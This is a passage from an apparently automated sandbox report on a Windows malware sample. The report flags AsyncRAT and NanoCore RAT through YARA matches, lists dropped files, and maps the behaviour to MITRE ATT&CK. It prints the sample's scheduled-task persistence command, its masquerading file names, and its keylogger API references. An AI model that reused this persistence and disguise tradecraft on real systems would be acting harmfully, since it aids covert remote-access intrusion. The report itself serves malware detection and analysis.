Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWance%SystemRoot%\system32\mswsock.dll2e,00,4e,00,45,00,54,00,20,00,43,00,4c,00,52,00,20,00,44,00,61,00,74,00,61,00,00,00,00,00.NET CLR Data6
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus
            Source: ame.exe, 00000003.00000003.526118644.000000001C031000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000003.574433837.000000001BCD9000.00000004.00000001.sdmpBinary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: Hyper-V Hypervisor
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx BusM
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.534630144.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider PipesP
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\ame.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: ame.exe.1.drJump to dropped file
            .NET source code references suspicious native API functionsShow sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmpBinary or memory string: Program Manager*
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmpBinary or memory string: Program Manager|
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmpBinary or memory string: =rProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\ame.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Notepads.exeQueries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Notepads.exeQueries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

            Stealing of Sensitive Information:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Detected Nanocore RatShow sources
            Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exeString found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exe, 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe.4.drString found in binary or memory: NanoCore.ClientPluginHost
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428EA bind,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428A9 bind,

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting221Windows Service2Access Token Manipulation1Disable or Modify Tools1Input Capture121File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Scheduled Task/Job2Windows Service2Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture121Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Process Injection12Scripting221Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsScheduled Task/Job2Logon Script (Mac)Scheduled Task/Job2Obfuscated Files or Information121NTDSSecurity Software Discovery211Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading2DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
